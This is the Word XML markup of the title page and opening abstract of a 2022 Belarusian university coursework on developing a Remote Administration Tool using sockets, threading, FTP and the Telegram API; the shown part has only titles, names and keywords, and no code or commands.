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6EE1" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="001A3E7F" w:rsidP="00FD0BE2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="001B187E">
        <w:t>МИНИСТЕРСТВО ОБРАЗОВАНИЯ РЕСПУБЛИКИ БЕЛАРУСЬ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD69CEF" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="00FD0BE2" w:rsidP="00FD0BE2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>УЧРЕЖДЕНИЕ ОБРАЗОВАНИЯ «</w:t>
      </w:r>
      <w:r w:rsidR="001A3E7F" w:rsidRPr="001B187E">
        <w:t>ВИТЕБСКИЙ ГОСУДАРСТВЕННЫЙ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364F4595" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="00FD0BE2" w:rsidP="00FD0BE2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>УНИВЕРСИТЕТ ИМЕНИ П.М.МАШЕРОВА»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2D26EB" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513ACB47" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001B187E">
        <w:t>Факультет математики и информационных технологий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57954EB0" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="00AC075A" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001B187E">
        <w:t xml:space="preserve">Кафедра </w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:t>прикладного и системного программирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F8A55C" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EEC71B7" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD37BA1" w14:textId="77777777" w:rsidR="00FD0BE2" w:rsidRDefault="00FD0BE2" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3ABCF4" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001B187E">
        <w:t>КУРСОВАЯ РАБОТА</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6FEB4F" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="00FD2BF8" w:rsidRDefault="00CA19C8" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Разработка</w:t>
      </w:r>
      <w:r w:rsidRPr="006805E4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8" w:rsidRPr="006805E4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:t>эксплуатация</w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8" w:rsidRPr="006805E4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8" w:rsidRPr="00FD2BF8">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emote</w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8" w:rsidRPr="006805E4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Administration</w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8" w:rsidRPr="006805E4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA2E32E" w14:textId="77777777" w:rsidR="0001026E" w:rsidRPr="006805E4" w:rsidRDefault="0001026E" w:rsidP="0001026E">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F23F5F" w14:textId="77777777" w:rsidR="0001026E" w:rsidRPr="001B187E" w:rsidRDefault="0001026E" w:rsidP="0001026E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD2BF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Специальность:</w:t>
      </w:r>
      <w:r w:rsidR="00C563E3">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-0</w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Прикладная информатика</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программное обеспечение компьютерных систем</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1675C2F5" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC4E142" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220279EB" w14:textId="77777777" w:rsidR="0001026E" w:rsidRDefault="0001026E" w:rsidP="0001026E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="5110" w:firstLine="702"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540BF726" w14:textId="77777777" w:rsidR="0001026E" w:rsidRDefault="0001026E" w:rsidP="0001026E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="5110" w:firstLine="702"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A155148" w14:textId="77777777" w:rsidR="0001026E" w:rsidRDefault="0001026E" w:rsidP="0001026E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="5110" w:firstLine="702"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDC2740" w14:textId="77777777" w:rsidR="0001026E" w:rsidRDefault="0001026E" w:rsidP="0001026E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="5110" w:firstLine="702"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDA91E5" w14:textId="77777777" w:rsidR="0001026E" w:rsidRPr="00FE2AFC" w:rsidRDefault="0001026E" w:rsidP="0001026E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="5110" w:firstLine="702"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2AFC">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Выполнил: </w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Беляев М.С</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2AFC">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521C019D" w14:textId="77777777" w:rsidR="0001026E" w:rsidRDefault="0001026E" w:rsidP="0001026E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="5110" w:firstLine="702"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>3 курс, 3</w:t>
      </w:r>
      <w:r w:rsidR="00FD2BF8">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> группа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1776D4F4" w14:textId="77777777" w:rsidR="0001026E" w:rsidRPr="00FE2AFC" w:rsidRDefault="0001026E" w:rsidP="0001026E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="5110" w:firstLine="702"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44D46437" w14:textId="77777777" w:rsidR="0001026E" w:rsidRDefault="00FD2BF8" w:rsidP="0001026E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="5110" w:firstLine="702"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Проверил</w:t>
      </w:r>
      <w:r w:rsidR="0001026E" w:rsidRPr="00FE2AFC">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Новый</w:t>
      </w:r>
      <w:r w:rsidR="0001026E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="0001026E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="0001026E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23156813" w14:textId="77777777" w:rsidR="0001026E" w:rsidRPr="00FE2AFC" w:rsidRDefault="00CD560C" w:rsidP="0001026E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="5110" w:firstLine="702"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="0001026E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>тарший преподаватель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07466F6E" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="0001026E" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="342D9039" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5302BC90" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B08C2B2" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A21ED1A" w14:textId="77777777" w:rsidR="001A3E7F" w:rsidRPr="001B187E" w:rsidRDefault="001A3E7F" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5291A808" w14:textId="77777777" w:rsidR="001F5CE3" w:rsidRDefault="001F5CE3" w:rsidP="001F5CE3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E80D7A" w14:textId="77777777" w:rsidR="00195B14" w:rsidRDefault="001A3E7F" w:rsidP="001F5CE3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001B187E">
        <w:t>Витебск</w:t>
      </w:r>
      <w:r w:rsidR="00CD560C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001B187E">
        <w:t xml:space="preserve"> 202</w:t>
      </w:r>
      <w:r w:rsidR="00AC075A">
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3959E19B" w14:textId="77777777" w:rsidR="00847E31" w:rsidRDefault="00195B14" w:rsidP="00951E3A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc104228161"/>
      <w:bookmarkStart w:id="2" w:name="_Toc104228643"/>
      <w:bookmarkStart w:id="3" w:name="_Toc104239413"/>
      <w:bookmarkStart w:id="4" w:name="_Toc104406623"/>
      <w:bookmarkStart w:id="5" w:name="_Toc105041584"/>
      <w:bookmarkStart w:id="6" w:name="_Toc105054066"/>
      <w:bookmarkStart w:id="7" w:name="_Toc105065715"/>
      <w:r w:rsidRPr="00951E3A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Реферат</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4830BA72" w14:textId="77777777" w:rsidR="00951E3A" w:rsidRPr="00951E3A" w:rsidRDefault="00951E3A" w:rsidP="00951E3A"/>
    <w:p w14:paraId="106D77AA" w14:textId="39641CC6" w:rsidR="00847E31" w:rsidRPr="00D12725" w:rsidRDefault="00847E31" w:rsidP="00CA19C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D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Курсовая работа </w:t>
      </w:r>
      <w:r w:rsidR="004F646A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="006A5C0D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> страниц</w:t>
      </w:r>
      <w:r w:rsidR="006A5C0D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006A5C0D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="004F646A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> рисунка</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003E651E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> источник</w:t>
      </w:r>
      <w:r w:rsidR="003E651E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52947CD7" w14:textId="77777777" w:rsidR="004E187A" w:rsidRPr="00156F5C" w:rsidRDefault="00E46359" w:rsidP="00CA19C8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidR="004E187A" w:rsidRPr="00156F5C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidR="004E187A" w:rsidRPr="00156F5C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000A17BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TELEGRAM</w:t>
      </w:r>
      <w:r w:rsidR="004E187A" w:rsidRPr="00156F5C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00001562" w:rsidRPr="00156F5C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00001562">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="00156F5C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, SOCKET,</w:t>
      </w:r>
      <w:r w:rsidR="00C82D53" w:rsidRPr="00C82D53">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C82D53">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>THREADING,</w:t>
      </w:r>
      <w:r w:rsidR="00156F5C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00156F5C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>СЕРВЕР</w:t>
      </w:r>
      <w:r w:rsidR="00F17B2E" w:rsidRPr="00156F5C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258613E8" w14:textId="77777777" w:rsidR="00847E31" w:rsidRPr="00C82D53" w:rsidRDefault="00847E31" w:rsidP="00CA19C8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00C82D53">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исследования</w:t>
      </w:r>
      <w:r w:rsidRPr="00C82D53">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00C82D53">
        <w:t>инструмент удалённого администрирования</w:t>
      </w:r>
      <w:r w:rsidR="004E187A" w:rsidRPr="00C82D53">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B66FEB" w14:textId="77777777" w:rsidR="00CD560C" w:rsidRPr="00E46359" w:rsidRDefault="00847E31" w:rsidP="00CD560C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Предмет</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46359">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исследования</w:t>
      </w:r>
